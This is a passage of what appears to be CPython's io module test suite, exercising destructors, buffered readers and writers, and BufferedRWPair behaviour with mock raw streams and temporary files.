except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
with support.check_warnings(('', ResourceWarning)):
f = MyFileIO(support.TESTFN, "wb")
f.write(b"xxx")
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def _check_base_destructor(self, base):
record = []
class MyIO(base):
def __init__(self):
# This exercises the availability of attributes on object
# destruction.
# (in the C version, close() is called by the tp_dealloc
# function, not by __del__)
self.on_del = 1
self.on_close = 2
self.on_flush = 3
def __del__(self):
record.append(self.on_del)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(self.on_close)
super().close()
def flush(self):
record.append(self.on_flush)
super().flush()
f = MyIO()
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_IOBase_destructor(self):
self._check_base_destructor(self.IOBase)
def test_RawIOBase_destructor(self):
self._check_base_destructor(self.RawIOBase)
def test_BufferedIOBase_destructor(self):
self._check_base_destructor(self.BufferedIOBase)
def test_TextIOBase_destructor(self):
self._check_base_destructor(self.TextIOBase)
def test_close_flushes(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def test_array_writes(self):
a = array.array('i', range(10))
n = len(a.tobytes())
with self.open(support.TESTFN, "wb", 0) as f:
self.assertEqual(f.write(a), n)
with self.open(support.TESTFN, "wb") as f:
self.assertEqual(f.write(a), n)
def test_closefd(self):
self.assertRaises(ValueError, self.open, support.TESTFN, 'w',
closefd=False)
def test_read_closed(self):
with self.open(support.TESTFN, "w") as f:
f.write("egg\n")
with self.open(support.TESTFN, "r") as f:
file = self.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.read(), "egg\n")
file.seek(0)
file.close()
self.assertRaises(ValueError, file.read)
def test_no_closefd_with_filename(self):
# can't use closefd in combination with a file name
self.assertRaises(ValueError, self.open, support.TESTFN, "r", closefd=False)
def test_closefd_attr(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"egg\n")
with self.open(support.TESTFN, "r") as f:
self.assertEqual(f.buffer.raw.closefd, True)
file = self.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.buffer.raw.closefd, False)
def test_garbage_collection(self):
# FileIO objects are collected, and collecting them flushes
# all data to disk.
with support.check_warnings(('', ResourceWarning)):
f = self.FileIO(support.TESTFN, "wb")
f.write(b"abcxxx")
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertTrue(wr() is None, wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"abcxxx")
def test_unbounded_file(self):
# Issue #1174606: reading from an unbounded stream such as /dev/zero.
zero = "/dev/zero"
if not os.path.exists(zero):
self.skipTest("{0} does not exist".format(zero))
if sys.maxsize > 0x7FFFFFFF:
self.skipTest("test can only run in a 32-bit address space")
if support.real_max_memuse < support._2G:
self.skipTest("test requires at least 2GB of memory")
with self.open(zero, "rb", buffering=0) as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "rb") as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "r") as f:
self.assertRaises(OverflowError, f.read)
def test_flush_error_on_close(self):
f = self.open(support.TESTFN, "wb", buffering=0)
def bad_flush():
raise OSError()
f.flush = bad_flush
self.assertRaises(OSError, f.close) # exception not swallowed
self.assertTrue(f.closed)
def test_multi_close(self):
f = self.open(support.TESTFN, "wb", buffering=0)
f.close()
f.close()
f.close()
self.assertRaises(ValueError, f.flush)
def test_RawIOBase_read(self):
# Exercise the default RawIOBase.read() implementation (which calls
# readinto() internally).
rawio = self.MockRawIOWithoutRead((b"abc", b"d", None, b"efg", None))
self.assertEqual(rawio.read(2), b"ab")
self.assertEqual(rawio.read(2), b"c")
self.assertEqual(rawio.read(2), b"d")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"ef")
self.assertEqual(rawio.read(2), b"g")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"")
def test_types_have_dict(self):
test = (
self.IOBase(),
self.RawIOBase(),
self.TextIOBase(),
self.StringIO(),
self.BytesIO()
)
for obj in test:
self.assertTrue(hasattr(obj, "__dict__"))
def test_opener(self):
with self.open(support.TESTFN, "w") as f:
f.write("egg\n")
fd = os.open(support.TESTFN, os.O_RDONLY)
def opener(path, flags):
return fd
with self.open("non-existent", "r", opener=opener) as f:
self.assertEqual(f.read(), "egg\n")
def test_fileio_closefd(self):
# Issue #4841
with self.open(__file__, 'rb') as f1, \
self.open(__file__, 'rb') as f2:
fileio = self.FileIO(f1.fileno(), closefd=False)
# .__init__() must not close f1
fileio.__init__(f2.fileno(), closefd=False)
f1.readline()
# .close() must not close f2
fileio.close()
f2.readline()
def test_nonbuffered_textio(self):
with warnings.catch_warnings(record=True) as recorded:
with self.assertRaises(ValueError):
self.open(support.TESTFN, 'w', buffering=0)
support.gc_collect()
self.assertEqual(recorded, [])
def test_invalid_newline(self):
with warnings.catch_warnings(record=True) as recorded:
with self.assertRaises(ValueError):
self.open(support.TESTFN, 'w', newline='invalid')
support.gc_collect()
self.assertEqual(recorded, [])
class CIOTest(IOTest):
def test_IOBase_finalize(self):
# Issue #12149: segmentation fault on _PyIOBase_finalize when both a
# class which inherits IOBase and an object of this class are caught
# in a reference cycle and close() is already in the method cache.
class MyIO(self.IOBase):
def close(self):
pass
# create an instance to populate the method cache
MyIO()
obj = MyIO()
obj.obj = obj
wr = weakref.ref(obj)
del MyIO
del obj
support.gc_collect()
self.assertTrue(wr() is None, wr)
class PyIOTest(IOTest):
pass
class CommonBufferedTests:
# Tests common to BufferedReader, BufferedWriter and BufferedRandom
def test_detach(self):
raw = self.MockRawIO()
buf = self.tp(raw)
self.assertIs(buf.detach(), raw)
self.assertRaises(ValueError, buf.detach)
repr(buf) # Should still work
def test_fileno(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertEqual(42, bufio.fileno())
@unittest.skip('test having existential crisis')
def test_no_fileno(self):
# XXX will we always have fileno() function? If so, kill
# this test. Else, write it.
pass
def test_invalid_args(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
# Invalid whence
self.assertRaises(ValueError, bufio.seek, 0, -1)
self.assertRaises(ValueError, bufio.seek, 0, 9)
def test_override_destructor(self):
tp = self.tp
record = []
class MyBufferedIO(tp):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
rawio = self.MockRawIO()
bufio = MyBufferedIO(rawio)
writable = bufio.writable()
del bufio
support.gc_collect()
if writable:
self.assertEqual(record, [1, 2, 3])
else:
self.assertEqual(record, [1, 2])
def test_context_manager(self):
# Test usability as a context manager
rawio = self.MockRawIO()
bufio = self.tp(rawio)
def _with():
with bufio:
pass
_with()
# bufio should now be closed, and using it a second time should raise
# a ValueError.
self.assertRaises(ValueError, _with)
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
def f():
self.tp(rawio).xyzzy
with support.captured_output("stderr") as s:
self.assertRaises(AttributeError, f)
s = s.getvalue().strip()
if s:
# The destructor *may* have printed an unraisable error, check it
self.assertEqual(len(s.splitlines()), 1)
self.assertTrue(s.startswith("Exception OSError: "), s)
self.assertTrue(s.endswith(" ignored"), s)
def test_repr(self):
raw = self.MockRawIO()
b = self.tp(raw)
clsname = "%s.%s" % (self.tp.__module__, self.tp.__name__)
self.assertEqual(repr(b), "<%s>" % clsname)
raw.name = "dummy"
self.assertEqual(repr(b), "<%s name='dummy'>" % clsname)
raw.name = b"dummy"
self.assertEqual(repr(b), "<%s name=b'dummy'>" % clsname)
def test_flush_error_on_close(self):
raw = self.MockRawIO()
def bad_flush():
raise OSError()
raw.flush = bad_flush
b = self.tp(raw)
self.assertRaises(OSError, b.close) # exception not swallowed
self.assertTrue(b.closed)
def test_close_error_on_close(self):
raw = self.MockRawIO()
def bad_flush():
raise OSError('flush')
def bad_close():
raise OSError('close')
raw.close = bad_close
b = self.tp(raw)
b.flush = bad_flush
with self.assertRaises(OSError) as err: # exception not swallowed
b.close()
self.assertEqual(err.exception.args, ('close',))
self.assertIsInstance(err.exception.__context__, OSError)
self.assertEqual(err.exception.__context__.args, ('flush',))
self.assertFalse(b.closed)
def test_nonnormalized_close_error_on_close(self):
# Issue #21677
raw = self.MockRawIO()
def bad_flush():
raise non_existing_flush
def bad_close():
raise non_existing_close
raw.close = bad_close
b = self.tp(raw)
b.flush = bad_flush
with self.assertRaises(NameError) as err: # exception not swallowed
b.close()
self.assertIn('non_existing_close', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('non_existing_flush', str(err.exception.__context__))
self.assertFalse(b.closed)
def test_multi_close(self):
raw = self.MockRawIO()
b = self.tp(raw)
b.close()
b.close()
b.close()
self.assertRaises(ValueError, b.flush)
def test_unseekable(self):
bufio = self.tp(self.MockUnseekableIO(b"A" * 10))
self.assertRaises(self.UnsupportedOperation, bufio.tell)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
def test_readonly_attributes(self):
raw = self.MockRawIO()
buf = self.tp(raw)
x = self.MockRawIO()
with self.assertRaises(AttributeError):
buf.raw = x
class SizeofTest:
@support.cpython_only
def test_sizeof(self):
bufsize1 = 4096
bufsize2 = 8192
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize1)
size = sys.getsizeof(bufio) - bufsize1
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize2)
self.assertEqual(sys.getsizeof(bufio), size + bufsize2)
@support.cpython_only
def test_buffer_freeing(self) :
bufsize = 4096
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize)
size = sys.getsizeof(bufio) - bufsize
bufio.close()
self.assertEqual(sys.getsizeof(bufio), size)
class BufferedReaderTest(unittest.TestCase, CommonBufferedTests):
read_mode = "rb"
def test_constructor(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(b"abc", bufio.read())
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
rawio = self.MockRawIO([b"abc"])
bufio.__init__(rawio)
self.assertEqual(b"abc", bufio.read())
def test_uninitialized(self):
bufio = self.tp.__new__(self.tp)
del bufio
bufio = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
bufio.read, 0)
bufio.__init__(self.MockRawIO())
self.assertEqual(bufio.read(0), b'')
def test_read(self):
for arg in (None, 7):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(arg))
# Invalid args
self.assertRaises(ValueError, bufio.read, -2)
def test_read1(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"a", bufio.read(1))
self.assertEqual(b"b", bufio.read1(1))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"c", bufio.read1(100))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"d", bufio.read1(100))
self.assertEqual(rawio._reads, 2)
self.assertEqual(b"efg", bufio.read1(100))
self.assertEqual(rawio._reads, 3)
self.assertEqual(b"", bufio.read1(100))
self.assertEqual(rawio._reads, 4)
# Invalid args
self.assertRaises(ValueError, bufio.read1, -1)
def test_readinto(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
b = bytearray(2)
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"cd")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ef")
self.assertEqual(bufio.readinto(b), 1)
self.assertEqual(b, b"gf")
self.assertEqual(bufio.readinto(b), 0)
self.assertEqual(b, b"gf")
rawio = self.MockRawIO((b"abc", None))
bufio = self.tp(rawio)
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(bufio.readinto(b), 1)
self.assertEqual(b, b"cb")
def test_readlines(self):
def bufio():
rawio = self.MockRawIO((b"abc\n", b"d\n", b"ef"))
return self.tp(rawio)
self.assertEqual(bufio().readlines(), [b"abc\n", b"d\n", b"ef"])
self.assertEqual(bufio().readlines(5), [b"abc\n", b"d\n"])
self.assertEqual(bufio().readlines(None), [b"abc\n", b"d\n", b"ef"])
def test_buffering(self):
data = b"abcdefghi"
dlen = len(data)
tests = [
[ 100, [ 3, 1, 4, 8 ], [ dlen, 0 ] ],
[ 100, [ 3, 3, 3], [ dlen ] ],
[ 4, [ 1, 2, 4, 2 ], [ 4, 4, 1 ] ],
]
for bufsize, buf_read_sizes, raw_read_sizes in tests:
rawio = self.MockFileIO(data)
bufio = self.tp(rawio, buffer_size=bufsize)
pos = 0
for nbytes in buf_read_sizes:
self.assertEqual(bufio.read(nbytes), data[pos:pos+nbytes])
pos += nbytes
# this is mildly implementation-dependent
self.assertEqual(rawio.read_history, raw_read_sizes)
def test_read_non_blocking(self):
# Inject some None's in there to simulate EWOULDBLOCK
rawio = self.MockRawIO((b"abc", b"d", None, b"efg", None, None, None))
bufio = self.tp(rawio)
self.assertEqual(b"abcd", bufio.read(6))
self.assertEqual(b"e", bufio.read(1))
self.assertEqual(b"fg", bufio.read())
self.assertEqual(b"", bufio.peek(1))
self.assertIsNone(bufio.read())
self.assertEqual(b"", bufio.read())
rawio = self.MockRawIO((b"a", None, None))
self.assertEqual(b"a", rawio.readall())
self.assertIsNone(rawio.readall())
def test_read_past_eof(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(9000))
def test_read_all(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read())
@unittest.skipUnless(threading, 'Threading required for this test.')
@support.requires_resource('cpu')
def test_threads(self):
try:
# Write out many bytes with exactly the same number of 0's,
# 1's... 255's. This will help us check that concurrent reading
# doesn't duplicate or forget contents.
N = 1000
l = list(range(256)) * N
random.shuffle(l)
s = bytes(bytearray(l))
with self.open(support.TESTFN, "wb") as f:
f.write(s)
with self.open(support.TESTFN, self.read_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
results = []
def f():
try:
# Intra-buffer read then buffer-flushing read
for n in cycle([1, 19]):
s = bufio.read(n)
if not s:
break
# list.append() is atomic
results.append(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
for t in threads:
t.start()
time.sleep(0.02) # yield
for t in threads:
t.join()
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
s = b''.join(results)
for i in range(256):
c = bytes(bytearray([i]))
self.assertEqual(s.count(c), N)
finally:
support.unlink(support.TESTFN)
def test_unseekable(self):
bufio = self.tp(self.MockUnseekableIO(b"A" * 10))
self.assertRaises(self.UnsupportedOperation, bufio.tell)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
bufio.read(1)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
self.assertRaises(self.UnsupportedOperation, bufio.tell)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertRaises(OSError, bufio.seek, 0)
self.assertRaises(OSError, bufio.tell)
def test_no_extraneous_read(self):
# Issue #9550; when the raw IO object has satisfied the read request,
# we should not issue any additional reads, otherwise it may block
# (e.g. socket).
bufsize = 16
for n in (2, bufsize - 1, bufsize, bufsize + 1, bufsize * 2):
rawio = self.MockRawIO([b"x" * n])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
# Simple case: one raw read is enough to satisfy the request.
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
# A more complex case where two raw reads are needed to satisfy
# the request.
rawio = self.MockRawIO([b"x" * (n - 1), b"x"])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
class CBufferedReaderTest(BufferedReaderTest, SizeofTest):
tp = io.BufferedReader
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2GB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.read)
def test_misbehaved_io_read(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
# _pyio.BufferedReader seems to implement reading different, so that
# checking this is not so easy.
self.assertRaises(OSError, bufio.read, 10)
def test_garbage_collection(self):
# C BufferedReader objects are collected.
# The Python version has __del__, so it ends into gc.garbage instead
with support.check_warnings(('', ResourceWarning)):
rawio = self.FileIO(support.TESTFN, "w+b")
f = self.tp(rawio)
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertTrue(wr() is None, wr)
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedReader"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedReaderTest(BufferedReaderTest):
tp = pyio.BufferedReader
class BufferedWriterTest(unittest.TestCase, CommonBufferedTests):
write_mode = "wb"
def test_constructor(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(3, bufio.write(b"abc"))
bufio.flush()
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
bufio.__init__(rawio)
self.assertEqual(3, bufio.write(b"ghi"))
bufio.flush()
self.assertEqual(b"".join(rawio._write_stack), b"abcghi")
def test_uninitialized(self):
bufio = self.tp.__new__(self.tp)
del bufio
bufio = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
bufio.write, b'')
bufio.__init__(self.MockRawIO())
self.assertEqual(bufio.write(b''), 0)
def test_detach_flush(self):
raw = self.MockRawIO()
buf = self.tp(raw)
buf.write(b"howdy!")
self.assertFalse(raw._write_stack)
buf.detach()
self.assertEqual(raw._write_stack, [b"howdy!"])
def test_write(self):
# Write to the buffered IO but don't overflow the buffer.
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
self.assertFalse(writer._write_stack)
def test_write_overflow(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
contents = b"abcdefghijklmnop"
for n in range(0, len(contents), 3):
bufio.write(contents[n:n+3])
flushed = b"".join(writer._write_stack)
# At least (total - 8) bytes were implicitly flushed, perhaps more
# depending on the implementation.
self.assertTrue(flushed.startswith(contents[:-8]), flushed)
def check_writes(self, intermediate_func):
# Lots of writes, test the flushed output is as expected.
contents = bytes(range(256)) * 1000
n = 0
writer = self.MockRawIO()
bufio = self.tp(writer, 13)
# Generator of write sizes: repeat each N 15 times then proceed to N+1
def gen_sizes():
for size in count(1):
for i in range(15):
yield size
sizes = gen_sizes()
while n < len(contents):
size = min(next(sizes), len(contents) - n)
self.assertEqual(bufio.write(contents[n:n+size]), size)
intermediate_func(bufio)
n += size
bufio.flush()
self.assertEqual(contents, b"".join(writer._write_stack))
def test_writes(self):
self.check_writes(lambda bufio: None)
def test_writes_and_flushes(self):
self.check_writes(lambda bufio: bufio.flush())
def test_writes_and_seeks(self):
def _seekabs(bufio):
pos = bufio.tell()
bufio.seek(pos + 1, 0)
bufio.seek(pos - 1, 0)
bufio.seek(pos, 0)
self.check_writes(_seekabs)
def _seekrel(bufio):
pos = bufio.seek(0, 1)
bufio.seek(+1, 1)
bufio.seek(-1, 1)
bufio.seek(pos, 0)
self.check_writes(_seekrel)
def test_writes_and_truncates(self):
self.check_writes(lambda bufio: bufio.truncate(bufio.tell()))
def test_write_non_blocking(self):
raw = self.MockNonBlockWriterIO()
bufio = self.tp(raw, 8)
self.assertEqual(bufio.write(b"abcd"), 4)
self.assertEqual(bufio.write(b"efghi"), 5)
# 1 byte will be written, the rest will be buffered
raw.block_on(b"k")
self.assertEqual(bufio.write(b"jklmn"), 5)
# 8 bytes will be written, 8 will be buffered and the rest will be lost
raw.block_on(b"0")
try:
bufio.write(b"opqrwxyz0123456789")
except self.BlockingIOError as e:
written = e.characters_written
else:
self.fail("BlockingIOError should have been raised")
self.assertEqual(written, 16)
self.assertEqual(raw.pop_written(),
b"abcdefghijklmnopqrwxyz")
self.assertEqual(bufio.write(b"ABCDEFGHI"), 9)
s = raw.pop_written()
# Previously buffered bytes were flushed
self.assertTrue(s.startswith(b"01234567A"), s)
def test_write_and_rewind(self):
raw = io.BytesIO()
bufio = self.tp(raw, 4)
self.assertEqual(bufio.write(b"abcdef"), 6)
self.assertEqual(bufio.tell(), 6)
bufio.seek(0, 0)
self.assertEqual(bufio.write(b"XY"), 2)
bufio.seek(6, 0)
self.assertEqual(raw.getvalue(), b"XYcdef")
self.assertEqual(bufio.write(b"123456"), 6)
bufio.flush()
self.assertEqual(raw.getvalue(), b"XYcdef123456")
def test_flush(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
bufio.flush()
self.assertEqual(b"abc", writer._write_stack[0])
def test_writelines(self):
l = [b'ab', b'cd', b'ef']
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_userlist(self):
l = UserList([b'ab', b'cd', b'ef'])
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_error(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
self.assertRaises(TypeError, bufio.writelines, [1, 2, 3])
self.assertRaises(TypeError, bufio.writelines, None)
self.assertRaises(TypeError, bufio.writelines, 'abc')
def test_destructor(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
del bufio
support.gc_collect()
self.assertEqual(b"abc", writer._write_stack[0])
def test_truncate(self):
# Truncate implicitly flushes the buffer.
with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
bufio.write(b"abcdef")
self.assertEqual(bufio.truncate(3), 3)
self.assertEqual(bufio.tell(), 6)
with self.open(support.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.read(), b"abc")
@unittest.skipUnless(threading, 'Threading required for this test.')
@support.requires_resource('cpu')
def test_threads(self):
try:
# Write out many bytes from many threads and test they were
# all flushed.
N = 1000
contents = bytes(range(256)) * N
sizes = cycle([1, 19])
n = 0
queue = deque()
while n < len(contents):
size = next(sizes)
queue.append(contents[n:n+size])
n += size
del contents
# We use a real file object because it allows us to
# exercise situations where the GIL is released before
# writing the buffer to the raw streams. This is in addition
# to concurrency issues due to switching threads in the middle
# of Python code.
with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
def f():
try:
while True:
try:
s = queue.popleft()
except IndexError:
return
bufio.write(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
for t in threads:
t.start()
time.sleep(0.02) # yield
for t in threads:
t.join()
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
bufio.close()
with self.open(support.TESTFN, "rb") as f:
s = f.read()
for i in range(256):
self.assertEqual(s.count(bytes([i])), N)
finally:
support.unlink(support.TESTFN)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO()
bufio = self.tp(rawio, 5)
self.assertRaises(OSError, bufio.seek, 0)
self.assertRaises(OSError, bufio.tell)
self.assertRaises(OSError, bufio.write, b"abcdef")
def test_max_buffer_size_removal(self):
with self.assertRaises(TypeError):
self.tp(self.MockRawIO(), 8, 12)
def test_write_error_on_close(self):
raw = self.MockRawIO()
def bad_write(b):
raise OSError()
raw.write = bad_write
b = self.tp(raw)
b.write(b'spam')
self.assertRaises(OSError, b.close) # exception not swallowed
self.assertTrue(b.closed)
class CBufferedWriterTest(BufferedWriterTest, SizeofTest):
tp = io.BufferedWriter
def test_constructor(self):
BufferedWriterTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2GB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.write, b"def")
def test_garbage_collection(self):
# C BufferedWriter objects are collected, and collecting them flushes
# all data to disk.
# The Python version has __del__, so it ends into gc.garbage instead
with support.check_warnings(('', ResourceWarning)):
rawio = self.FileIO(support.TESTFN, "w+b")
f = self.tp(rawio)
f.write(b"123xxx")
f.x = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertTrue(wr() is None, wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"123xxx")
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedWriter"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedWriterTest(BufferedWriterTest):
tp = pyio.BufferedWriter
class BufferedRWPairTest(unittest.TestCase):
def test_constructor(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
def test_uninitialized(self):
pair = self.tp.__new__(self.tp)
del pair
pair = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
pair.read, 0)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
pair.write, b'')
pair.__init__(self.MockRawIO(), self.MockRawIO())
self.assertEqual(pair.read(0), b'')
self.assertEqual(pair.write(b''), 0)
def test_detach(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertRaises(self.UnsupportedOperation, pair.detach)
def test_constructor_max_buffer_size_removal(self):
with self.assertRaises(TypeError):
self.tp(self.MockRawIO(), self.MockRawIO(), 8, 12)
def test_constructor_with_not_readable(self):
class NotReadable(MockRawIO):
def readable(self):
return False
self.assertRaises(OSError, self.tp, NotReadable(), self.MockRawIO())
def test_constructor_with_not_writeable(self):
class NotWriteable(MockRawIO):
def writable(self):
return False
self.assertRaises(OSError, self.tp, self.MockRawIO(), NotWriteable())
def test_read(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read(3), b"abc")
self.assertEqual(pair.read(1), b"d")
self.assertEqual(pair.read(), b"ef")
pair = self.tp(self.BytesIO(b"abc"), self.MockRawIO())
self.assertEqual(pair.read(None), b"abc")
def test_readlines(self):
pair = lambda: self.tp(self.BytesIO(b"abc\ndef\nh"), self.MockRawIO())
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(5), [b"abc\n", b"def\n"])
def test_read1(self):
# .read1() is delegated to the underlying reader object, so this test
# can be shallow.
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read1(3), b"abc")
def test_readinto(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
data = bytearray(5)
self.assertEqual(pair.readinto(data), 5)
self.assertEqual(data, b"abcde")
def test_write(self):
w = self.MockRawIO()
pair = self.tp(self.MockRawIO(), w)
pair.write(b"abc")
pair.flush()
pair.write(b"def")
pair.flush()
self.assertEqual(w._write_stack, [b"abc", b"def"])
def test_peek(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertTrue(pair.peek(3).startswith(b"abc"))
self.assertEqual(pair.read(3), b"abc")
def test_readable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.readable())
def test_writeable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.writable())
def test_seekable(self):
# BufferedRWPairs are never seekable, even if their readers and writers
# are.
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.seekable())
# .flush() is delegated to the underlying writer object and has been
# tested in the test_write method.
def test_close_and_closed(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
